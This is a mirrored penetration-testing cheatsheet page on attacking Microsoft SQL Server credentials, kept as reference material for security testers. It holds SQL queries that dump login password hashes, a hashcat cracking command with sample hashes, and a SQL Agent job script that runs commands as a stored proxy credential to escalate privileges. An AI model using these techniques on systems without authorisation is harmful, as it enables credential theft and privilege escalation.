daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

mssql-credentials.md (4100B)


      1 ---
      2 title: "MSSQL - Credentials"
      3 section: "Databases"
      4 sectionSlug: "databases"
      5 sourcePath: "docs/databases/mssql-credentials.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/databases/mssql-credentials.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # MSSQL - Credentials
     12 
     13 ## Summary
     14 
     15 * [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
     16 * [List Credentials on the SQL Server](#list-credentials-on-the-sql-server)
     17 * [Proxy Account Context](#proxy-account-context)
     18 
     19 ## MSSQL Accounts and Hashes
     20 
     21 * MSSQL 2000
     22 
     23     ```sql
     24     SELECT name, password FROM master..sysxlogins
     25     SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins 
     26     -- (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
     27     ```
     28 
     29 * MSSQL 2005
     30 
     31     ```sql
     32     SELECT name, password_hash FROM master.sys.sql_logins
     33     SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
     34     ```
     35 
     36 Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
     37 
     38 | Hash-Mode | Hash-Name          | Example                                                                                                                                        |
     39 | --------- | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------- |
     40 | 131       | MSSQL (2000)       | 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578                                                 |
     41 | 132       | MSSQL (2005)       | 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe                                                                                         |
     42 | 1731      | MSSQL (2012, 2014) | 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 |
     43 
     44 ## List Credentials on the SQL Server
     45 
     46 * List credentials configured on the SQL Server instance
     47 
     48     ```sql
     49     SELECT * FROM sys.credentials 
     50     ```
     51 
     52 * List proxy accounts
     53 
     54     ```sql
     55     USE msdb; 
     56     GO 
     57 
     58     SELECT  
     59         proxy_id, 
     60         name AS proxy_name, 
     61         credential_id, 
     62         enabled 
     63     FROM  
     64         dbo.sysproxies; 
     65     GO 
     66     ```
     67 
     68 * [dataplat/dbatools/Get-DecryptedObject.ps1](https://github.com/dataplat/dbatools/blob/7ad0415c2f8a58d3472c1e85ee431c70f1bb8ae4/private/functions/Get-DecryptedObject.ps1)
     69 
     70 ## Proxy Account Context
     71 
     72 Agent Job using the registered proxy credential.
     73 
     74 ```sql
     75 USE msdb; 
     76 GO 
     77 
     78 -- Create the job 
     79 EXEC sp_add_job  
     80   @job_name = N'WhoAmIJob'; -- Name of the job 
     81 
     82 -- Add a job step that uses the proxy to execute the whoami command 
     83 EXEC sp_add_jobstep  
     84   @job_name = N'WhoAmIJob',  
     85   @step_name = N'ExecuteWhoAmI',  
     86   @subsystem = N'CmdExec',          
     87   @command = N'c:\windows\system32\cmd.exe /c whoami > c:\windows\temp\whoami.txt',           
     88   @on_success_action = 1,         -- 1 = Quit with success 
     89   @on_fail_action = 2,                     -- 2 = Quit with failure 
     90   @proxy_name = N'MyCredentialProxy';     -- The proxy created earlier 
     91 
     92 -- Add a schedule to the job (optional, can be manual or scheduled) 
     93 EXEC sp_add_jobschedule  
     94   @job_name = N'WhoAmIJob',  
     95   @name = N'RunOnce',  
     96   @freq_type = 1,             -- 1 = Once 
     97   @active_start_date = 20240820,       
     98   @active_start_time = 120000;            
     99 
    100 -- Add the job to the SQL Server Agent 
    101 EXEC sp_add_jobserver  
    102   @job_name = N'WhoAmIJob',  
    103   @server_name = N'(LOCAL)';  
    104 ```
    105 
    106 Execute the Agent job so that a process will be started in the context of the proxy account and execute your code/command.
    107 `EXEC sp_start_job @job_name = N'WhoAmIJob';`
    108 
    109 ## References
    110 
    111 * [Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation  - Scott Sutherland - September 10, 2024](https://www.netspi.com/blog/technical-blog/network-pentesting/hijacking-sql-server-credentials-with-agent-jobs-for-domain-privilege-escalation/)